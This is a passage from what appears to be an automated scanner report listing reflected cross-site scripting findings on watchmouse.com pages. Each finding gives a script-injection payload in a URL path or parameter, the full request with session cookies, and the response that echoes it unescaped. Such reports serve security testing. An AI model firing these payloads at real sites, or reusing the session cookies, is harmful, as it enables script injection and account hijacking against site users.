<form id="login_form" action="https://secure.watchmouse.com/en/learn_more.php?edfa0"><script>alert(1)</script>4b83c53d260=1" method="post">
...[SNIP]...

1.170. http://www.watchmouse.com/en/management.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/management.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d9ee"><script>alert(1)</script>44472ed8380 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en8d9ee"><script>alert(1)</script>44472ed8380/management.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-76888d2521f640f1b36065520610f1cd"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en8d9ee"><script>alert(1)</script>44472ed8380/management.php" method="post">
...[SNIP]...

1.171. http://www.watchmouse.com/en/management.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/management.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64f2b"><script>alert(1)</script>50cbeca7a5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/management.php64f2b"><script>alert(1)</script>50cbeca7a5d HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-a42e382d7702fab1b9197067174f651b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/management.php64f2b"><script>alert(1)</script>50cbeca7a5d" method="post">
...[SNIP]...

1.172. http://www.watchmouse.com/en/management.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/management.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0d39"><script>alert(1)</script>83345a196c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/management.php?e0d39"><script>alert(1)</script>83345a196c8=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-2534c57b41fb7d87345a1dce9519a276"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20281

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/management.php?e0d39"><script>alert(1)</script>83345a196c8=1" method="post">
...[SNIP]...

1.173. http://www.watchmouse.com/en/media_contact.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/media_contact.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 625d3"><script>alert(1)</script>62c79d3d9ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en625d3"><script>alert(1)</script>62c79d3d9ae/media_contact.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-80d369f8099ae6f086f5b28790abc825"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en625d3"><script>alert(1)</script>62c79d3d9ae/media_contact.php" method="post">
...[SNIP]...

1.174. http://www.watchmouse.com/en/media_contact.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/media_contact.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ad8e"><script>alert(1)</script>5d14b7094d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/media_contact.php9ad8e"><script>alert(1)</script>5d14b7094d7 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-42cbe231d1f8915d808dfd76e9d77606"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/media_contact.php9ad8e"><script>alert(1)</script>5d14b7094d7" method="post">
...[SNIP]...

1.175. http://www.watchmouse.com/en/media_contact.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/media_contact.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa2c7"><script>alert(1)</script>da68d8d35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/media_contact.php?fa2c7"><script>alert(1)</script>da68d8d35=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-319368b5e3e73bd61d2f4b5a008af48a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/media_contact.php?fa2c7"><script>alert(1)</script>da68d8d35=1" method="post">
...[SNIP]...

1.176. http://www.watchmouse.com/en/my_subscription.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/my_subscription.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d13ac"><script>alert(1)</script>d193e4cf41c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /end13ac"><script>alert(1)</script>d193e4cf41c/my_subscription.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:59 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-d208559d88e0fef748471202b3178f38"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/end13ac"><script>alert(1)</script>d193e4cf41c/my_subscription.php" method="post">
...[SNIP]...

1.177. http://www.watchmouse.com/en/my_subscription.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/my_subscription.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8187a"><script>alert(1)</script>8b94132c790 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/my_subscription.php8187a"><script>alert(1)</script>8b94132c790 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-1799aef54a342d5cea0fcfcc7e27555d"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/my_subscription.php8187a"><script>alert(1)</script>8b94132c790" method="post">
...[SNIP]...

1.178. http://www.watchmouse.com/en/my_subscription.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/my_subscription.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb512"><script>alert(1)</script>c18089a26a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/my_subscription.php?fb512"><script>alert(1)</script>c18089a26a0=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:51 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-e13d9132d46e1f013868c65045864cbb"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/my_subscription.php?fb512"><script>alert(1)</script>c18089a26a0=1" method="post">
...[SNIP]...

1.179. http://www.watchmouse.com/en/my_subscription.php [vpackid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/my_subscription.php

Issue detail

The value of the vpackid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75827"><script>alert(1)</script>fa39f9d05db was submitted in the vpackid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/my_subscription.php?vpackid=19575827"><script>alert(1)</script>fa39f9d05db&vaction=customize HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-0219dd0e329245d9a26b24630a2ff6b5"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/my_subscription.php?vpackid=19575827"><script>alert(1)</script>fa39f9d05db&vaction=customize" method="post">
...[SNIP]...

1.180. http://www.watchmouse.com/en/newsletters.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/newsletters.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57225"><script>alert(1)</script>1f6547819ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en57225"><script>alert(1)</script>1f6547819ed/newsletters.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f74dd020ce3f3de60d43ff5febff386b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en57225"><script>alert(1)</script>1f6547819ed/newsletters.php" method="post">
...[SNIP]...

1.181. http://www.watchmouse.com/en/newsletters.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/newsletters.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fddef"><script>alert(1)</script>f539ffacd0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/newsletters.phpfddef"><script>alert(1)</script>f539ffacd0b HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-2ae96d84b500aa48b33f07ae27291339"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/newsletters.phpfddef"><script>alert(1)</script>f539ffacd0b" method="post">
...[SNIP]...

1.182. http://www.watchmouse.com/en/newsletters.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/newsletters.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0706"><script>alert(1)</script>1cd1afd9ac5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/newsletters.php?f0706"><script>alert(1)</script>1cd1afd9ac5=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-d8710cfce66cf8d887b5fae4444d6dbc"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/newsletters.php?f0706"><script>alert(1)</script>1cd1afd9ac5=1" method="post">
...[SNIP]...

1.183. http://www.watchmouse.com/en/non_profit_offering.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/non_profit_offering.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ee22"><script>alert(1)</script>953163f9df9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en3ee22"><script>alert(1)</script>953163f9df9/non_profit_offering.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:00 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-8a15e285b36be76953fdb5bc55e90a25"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en3ee22"><script>alert(1)</script>953163f9df9/non_profit_offering.php" method="post">
...[SNIP]...

1.184. http://www.watchmouse.com/en/non_profit_offering.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/non_profit_offering.php

Issue detail

